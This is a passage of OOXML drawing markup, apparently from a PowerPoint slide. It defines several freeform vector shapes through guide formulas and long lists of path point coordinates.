                  <a:gd name="T66" fmla="*/ 158 w 479"/>
                  <a:gd name="T67" fmla="*/ 178 h 730"/>
                  <a:gd name="T68" fmla="*/ 210 w 479"/>
                  <a:gd name="T69" fmla="*/ 94 h 730"/>
                  <a:gd name="T70" fmla="*/ 273 w 479"/>
                  <a:gd name="T71" fmla="*/ 136 h 730"/>
                  <a:gd name="T72" fmla="*/ 357 w 479"/>
                  <a:gd name="T73" fmla="*/ 0 h 730"/>
                  <a:gd name="T74" fmla="*/ 478 w 479"/>
                  <a:gd name="T75" fmla="*/ 78 h 7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79" h="730">
                    <a:moveTo>
                      <a:pt x="478" y="78"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="389" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="729"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="729"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="78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7" name="Freeform 84"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3646488" y="5902325"/>
                <a:ext cx="182562" cy="258763"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 410 w 505"/>
                  <a:gd name="T1" fmla="*/ 236 h 720"/>
                  <a:gd name="T2" fmla="*/ 121 w 505"/>
                  <a:gd name="T3" fmla="*/ 719 h 720"/>
                  <a:gd name="T4" fmla="*/ 0 w 505"/>
                  <a:gd name="T5" fmla="*/ 646 h 720"/>
                  <a:gd name="T6" fmla="*/ 284 w 505"/>
                  <a:gd name="T7" fmla="*/ 162 h 720"/>
                  <a:gd name="T8" fmla="*/ 410 w 505"/>
                  <a:gd name="T9" fmla="*/ 236 h 720"/>
                  <a:gd name="T10" fmla="*/ 504 w 505"/>
                  <a:gd name="T11" fmla="*/ 73 h 720"/>
                  <a:gd name="T12" fmla="*/ 441 w 505"/>
                  <a:gd name="T13" fmla="*/ 178 h 720"/>
                  <a:gd name="T14" fmla="*/ 321 w 505"/>
                  <a:gd name="T15" fmla="*/ 105 h 720"/>
                  <a:gd name="T16" fmla="*/ 383 w 505"/>
                  <a:gd name="T17" fmla="*/ 0 h 720"/>
                  <a:gd name="T18" fmla="*/ 504 w 505"/>
                  <a:gd name="T19" fmla="*/ 73 h 7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05" h="720">
                    <a:moveTo>
                      <a:pt x="410" y="236"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="121" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="236"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="504" y="73"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="441" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="73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" name="Freeform 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3746500" y="6024563"/>
                <a:ext cx="184150" cy="207962"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 163 w 511"/>
                  <a:gd name="T1" fmla="*/ 315 h 578"/>
                  <a:gd name="T2" fmla="*/ 142 w 511"/>
                  <a:gd name="T3" fmla="*/ 357 h 578"/>
                  <a:gd name="T4" fmla="*/ 132 w 511"/>
                  <a:gd name="T5" fmla="*/ 399 h 578"/>
                  <a:gd name="T6" fmla="*/ 137 w 511"/>
                  <a:gd name="T7" fmla="*/ 436 h 578"/>
                  <a:gd name="T8" fmla="*/ 147 w 511"/>
                  <a:gd name="T9" fmla="*/ 451 h 578"/>
                  <a:gd name="T10" fmla="*/ 163 w 511"/>
                  <a:gd name="T11" fmla="*/ 462 h 578"/>
                  <a:gd name="T12" fmla="*/ 194 w 511"/>
                  <a:gd name="T13" fmla="*/ 472 h 578"/>
                  <a:gd name="T14" fmla="*/ 220 w 511"/>
                  <a:gd name="T15" fmla="*/ 462 h 578"/>
                  <a:gd name="T16" fmla="*/ 247 w 511"/>
                  <a:gd name="T17" fmla="*/ 441 h 578"/>
                  <a:gd name="T18" fmla="*/ 394 w 511"/>
                  <a:gd name="T19" fmla="*/ 462 h 578"/>
                  <a:gd name="T20" fmla="*/ 367 w 511"/>
                  <a:gd name="T21" fmla="*/ 504 h 578"/>
                  <a:gd name="T22" fmla="*/ 310 w 511"/>
                  <a:gd name="T23" fmla="*/ 556 h 578"/>
                  <a:gd name="T24" fmla="*/ 279 w 511"/>
                  <a:gd name="T25" fmla="*/ 572 h 578"/>
                  <a:gd name="T26" fmla="*/ 205 w 511"/>
                  <a:gd name="T27" fmla="*/ 577 h 578"/>
                  <a:gd name="T28" fmla="*/ 121 w 511"/>
                  <a:gd name="T29" fmla="*/ 546 h 578"/>
                  <a:gd name="T30" fmla="*/ 90 w 511"/>
                  <a:gd name="T31" fmla="*/ 530 h 578"/>
                  <a:gd name="T32" fmla="*/ 43 w 511"/>
                  <a:gd name="T33" fmla="*/ 488 h 578"/>
                  <a:gd name="T34" fmla="*/ 26 w 511"/>
                  <a:gd name="T35" fmla="*/ 467 h 578"/>
                  <a:gd name="T36" fmla="*/ 6 w 511"/>
                  <a:gd name="T37" fmla="*/ 420 h 578"/>
                  <a:gd name="T38" fmla="*/ 0 w 511"/>
                  <a:gd name="T39" fmla="*/ 378 h 578"/>
                  <a:gd name="T40" fmla="*/ 6 w 511"/>
                  <a:gd name="T41" fmla="*/ 330 h 578"/>
                  <a:gd name="T42" fmla="*/ 21 w 511"/>
                  <a:gd name="T43" fmla="*/ 278 h 578"/>
                  <a:gd name="T44" fmla="*/ 69 w 511"/>
                  <a:gd name="T45" fmla="*/ 183 h 578"/>
                  <a:gd name="T46" fmla="*/ 126 w 511"/>
                  <a:gd name="T47" fmla="*/ 89 h 578"/>
                  <a:gd name="T48" fmla="*/ 158 w 511"/>
                  <a:gd name="T49" fmla="*/ 53 h 578"/>
                  <a:gd name="T50" fmla="*/ 194 w 511"/>
                  <a:gd name="T51" fmla="*/ 26 h 578"/>
                  <a:gd name="T52" fmla="*/ 237 w 511"/>
                  <a:gd name="T53" fmla="*/ 5 h 578"/>
                  <a:gd name="T54" fmla="*/ 284 w 511"/>
                  <a:gd name="T55" fmla="*/ 0 h 578"/>
                  <a:gd name="T56" fmla="*/ 310 w 511"/>
                  <a:gd name="T57" fmla="*/ 0 h 578"/>
                  <a:gd name="T58" fmla="*/ 367 w 511"/>
                  <a:gd name="T59" fmla="*/ 16 h 578"/>
                  <a:gd name="T60" fmla="*/ 399 w 511"/>
                  <a:gd name="T61" fmla="*/ 31 h 578"/>
                  <a:gd name="T62" fmla="*/ 467 w 511"/>
                  <a:gd name="T63" fmla="*/ 79 h 578"/>
                  <a:gd name="T64" fmla="*/ 478 w 511"/>
                  <a:gd name="T65" fmla="*/ 100 h 578"/>
                  <a:gd name="T66" fmla="*/ 510 w 511"/>
                  <a:gd name="T67" fmla="*/ 178 h 578"/>
                  <a:gd name="T68" fmla="*/ 510 w 511"/>
                  <a:gd name="T69" fmla="*/ 220 h 578"/>
                  <a:gd name="T70" fmla="*/ 494 w 511"/>
                  <a:gd name="T71" fmla="*/ 273 h 578"/>
                  <a:gd name="T72" fmla="*/ 447 w 511"/>
                  <a:gd name="T73" fmla="*/ 378 h 578"/>
                  <a:gd name="T74" fmla="*/ 184 w 511"/>
                  <a:gd name="T75" fmla="*/ 273 h 578"/>
                  <a:gd name="T76" fmla="*/ 373 w 511"/>
                  <a:gd name="T77" fmla="*/ 215 h 578"/>
                  <a:gd name="T78" fmla="*/ 378 w 511"/>
                  <a:gd name="T79" fmla="*/ 194 h 578"/>
                  <a:gd name="T80" fmla="*/ 384 w 511"/>
                  <a:gd name="T81" fmla="*/ 173 h 578"/>
                  <a:gd name="T82" fmla="*/ 378 w 511"/>
                  <a:gd name="T83" fmla="*/ 142 h 578"/>
                  <a:gd name="T84" fmla="*/ 367 w 511"/>
                  <a:gd name="T85" fmla="*/ 126 h 578"/>
                  <a:gd name="T86" fmla="*/ 347 w 511"/>
                  <a:gd name="T87" fmla="*/ 115 h 578"/>
                  <a:gd name="T88" fmla="*/ 310 w 511"/>
                  <a:gd name="T89" fmla="*/ 110 h 578"/>
                  <a:gd name="T90" fmla="*/ 294 w 511"/>
                  <a:gd name="T91" fmla="*/ 110 h 578"/>
                  <a:gd name="T92" fmla="*/ 279 w 511"/>
                  <a:gd name="T93" fmla="*/ 120 h 578"/>
                  <a:gd name="T94" fmla="*/ 252 w 511"/>
                  <a:gd name="T95" fmla="*/ 147 h 578"/>
                  <a:gd name="T96" fmla="*/ 220 w 511"/>
                  <a:gd name="T97" fmla="*/ 200 h 578"/>
                  <a:gd name="T98" fmla="*/ 352 w 511"/>
                  <a:gd name="T99" fmla="*/ 267 h 5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11" h="578">
                    <a:moveTo>
                      <a:pt x="163" y="315"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="163" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="315"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="373" y="215"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="373" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="215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9" name="Freeform 86"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3902075" y="6097588"/>
                <a:ext cx="184150" cy="212725"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 142 w 510"/>
                  <a:gd name="T1" fmla="*/ 368 h 589"/>
                  <a:gd name="T2" fmla="*/ 136 w 510"/>
                  <a:gd name="T3" fmla="*/ 431 h 589"/>
                  <a:gd name="T4" fmla="*/ 142 w 510"/>
                  <a:gd name="T5" fmla="*/ 441 h 589"/>
                  <a:gd name="T6" fmla="*/ 178 w 510"/>
                  <a:gd name="T7" fmla="*/ 473 h 589"/>
                  <a:gd name="T8" fmla="*/ 204 w 510"/>
                  <a:gd name="T9" fmla="*/ 484 h 589"/>
                  <a:gd name="T10" fmla="*/ 230 w 510"/>
                  <a:gd name="T11" fmla="*/ 478 h 589"/>
                  <a:gd name="T12" fmla="*/ 252 w 510"/>
                  <a:gd name="T13" fmla="*/ 468 h 589"/>
                  <a:gd name="T14" fmla="*/ 267 w 510"/>
                  <a:gd name="T15" fmla="*/ 441 h 589"/>
                  <a:gd name="T16" fmla="*/ 273 w 510"/>
                  <a:gd name="T17" fmla="*/ 400 h 589"/>
                  <a:gd name="T18" fmla="*/ 262 w 510"/>
                  <a:gd name="T19" fmla="*/ 379 h 589"/>
                  <a:gd name="T20" fmla="*/ 173 w 510"/>
                  <a:gd name="T21" fmla="*/ 289 h 589"/>
                  <a:gd name="T22" fmla="*/ 152 w 510"/>
                  <a:gd name="T23" fmla="*/ 268 h 589"/>
                  <a:gd name="T24" fmla="*/ 120 w 510"/>
                  <a:gd name="T25" fmla="*/ 221 h 589"/>
                  <a:gd name="T26" fmla="*/ 110 w 510"/>
                  <a:gd name="T27" fmla="*/ 200 h 589"/>
                  <a:gd name="T28" fmla="*/ 110 w 510"/>
                  <a:gd name="T29" fmla="*/ 147 h 589"/>
                  <a:gd name="T30" fmla="*/ 126 w 510"/>
                  <a:gd name="T31" fmla="*/ 95 h 589"/>
                  <a:gd name="T32" fmla="*/ 142 w 510"/>
                  <a:gd name="T33" fmla="*/ 69 h 589"/>
                  <a:gd name="T34" fmla="*/ 163 w 510"/>
                  <a:gd name="T35" fmla="*/ 43 h 589"/>
                  <a:gd name="T36" fmla="*/ 215 w 510"/>
                  <a:gd name="T37" fmla="*/ 11 h 589"/>
                  <a:gd name="T38" fmla="*/ 252 w 510"/>
                  <a:gd name="T39" fmla="*/ 0 h 589"/>
                  <a:gd name="T40" fmla="*/ 289 w 510"/>
                  <a:gd name="T41" fmla="*/ 0 h 589"/>
                  <a:gd name="T42" fmla="*/ 383 w 510"/>
                  <a:gd name="T43" fmla="*/ 27 h 589"/>
                  <a:gd name="T44" fmla="*/ 420 w 510"/>
                  <a:gd name="T45" fmla="*/ 48 h 589"/>
                  <a:gd name="T46" fmla="*/ 477 w 510"/>
                  <a:gd name="T47" fmla="*/ 95 h 589"/>
                  <a:gd name="T48" fmla="*/ 498 w 510"/>
                  <a:gd name="T49" fmla="*/ 126 h 589"/>
                  <a:gd name="T50" fmla="*/ 509 w 510"/>
                  <a:gd name="T51" fmla="*/ 184 h 589"/>
                  <a:gd name="T52" fmla="*/ 493 w 510"/>
                  <a:gd name="T53" fmla="*/ 253 h 589"/>
                  <a:gd name="T54" fmla="*/ 362 w 510"/>
                  <a:gd name="T55" fmla="*/ 221 h 589"/>
                  <a:gd name="T56" fmla="*/ 378 w 510"/>
                  <a:gd name="T57" fmla="*/ 184 h 589"/>
                  <a:gd name="T58" fmla="*/ 378 w 510"/>
                  <a:gd name="T59" fmla="*/ 153 h 589"/>
                  <a:gd name="T60" fmla="*/ 367 w 510"/>
                  <a:gd name="T61" fmla="*/ 132 h 589"/>
                  <a:gd name="T62" fmla="*/ 341 w 510"/>
                  <a:gd name="T63" fmla="*/ 116 h 589"/>
                  <a:gd name="T64" fmla="*/ 289 w 510"/>
                  <a:gd name="T65" fmla="*/ 111 h 589"/>
                  <a:gd name="T66" fmla="*/ 278 w 510"/>
                  <a:gd name="T67" fmla="*/ 116 h 589"/>
                  <a:gd name="T68" fmla="*/ 252 w 510"/>
                  <a:gd name="T69" fmla="*/ 143 h 589"/>
                  <a:gd name="T70" fmla="*/ 252 w 510"/>
                  <a:gd name="T71" fmla="*/ 163 h 589"/>
                  <a:gd name="T72" fmla="*/ 252 w 510"/>
                  <a:gd name="T73" fmla="*/ 184 h 589"/>
                  <a:gd name="T74" fmla="*/ 283 w 510"/>
                  <a:gd name="T75" fmla="*/ 232 h 589"/>
                  <a:gd name="T76" fmla="*/ 351 w 510"/>
                  <a:gd name="T77" fmla="*/ 289 h 589"/>
                  <a:gd name="T78" fmla="*/ 394 w 510"/>
                  <a:gd name="T79" fmla="*/ 337 h 589"/>
                  <a:gd name="T80" fmla="*/ 414 w 510"/>
                  <a:gd name="T81" fmla="*/ 384 h 589"/>
                  <a:gd name="T82" fmla="*/ 420 w 510"/>
                  <a:gd name="T83" fmla="*/ 410 h 589"/>
                  <a:gd name="T84" fmla="*/ 409 w 510"/>
                  <a:gd name="T85" fmla="*/ 457 h 589"/>
                  <a:gd name="T86" fmla="*/ 399 w 510"/>
                  <a:gd name="T87" fmla="*/ 489 h 589"/>
                  <a:gd name="T88" fmla="*/ 351 w 510"/>
                  <a:gd name="T89" fmla="*/ 552 h 589"/>
                  <a:gd name="T90" fmla="*/ 325 w 510"/>
                  <a:gd name="T91" fmla="*/ 573 h 589"/>
                  <a:gd name="T92" fmla="*/ 294 w 510"/>
                  <a:gd name="T93" fmla="*/ 583 h 589"/>
                  <a:gd name="T94" fmla="*/ 220 w 510"/>
                  <a:gd name="T95" fmla="*/ 588 h 589"/>
                  <a:gd name="T96" fmla="*/ 178 w 510"/>
                  <a:gd name="T97" fmla="*/ 578 h 589"/>
                  <a:gd name="T98" fmla="*/ 142 w 510"/>
                  <a:gd name="T99" fmla="*/ 562 h 589"/>
                  <a:gd name="T100" fmla="*/ 53 w 510"/>
                  <a:gd name="T101" fmla="*/ 510 h 589"/>
                  <a:gd name="T102" fmla="*/ 26 w 510"/>
                  <a:gd name="T103" fmla="*/ 484 h 589"/>
                  <a:gd name="T104" fmla="*/ 10 w 510"/>
                  <a:gd name="T105" fmla="*/ 452 h 589"/>
                  <a:gd name="T106" fmla="*/ 0 w 510"/>
                  <a:gd name="T107" fmla="*/ 389 h 589"/>
                  <a:gd name="T108" fmla="*/ 10 w 510"/>
                  <a:gd name="T109" fmla="*/ 352 h 589"/>
                  <a:gd name="T110" fmla="*/ 31 w 510"/>
                  <a:gd name="T111" fmla="*/ 300 h 589"/>
                  <a:gd name="T112" fmla="*/ 142 w 510"/>
                  <a:gd name="T113" fmla="*/ 368 h 5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10" h="589">
                    <a:moveTo>
                      <a:pt x="142" y="368"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="142" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="43"/>
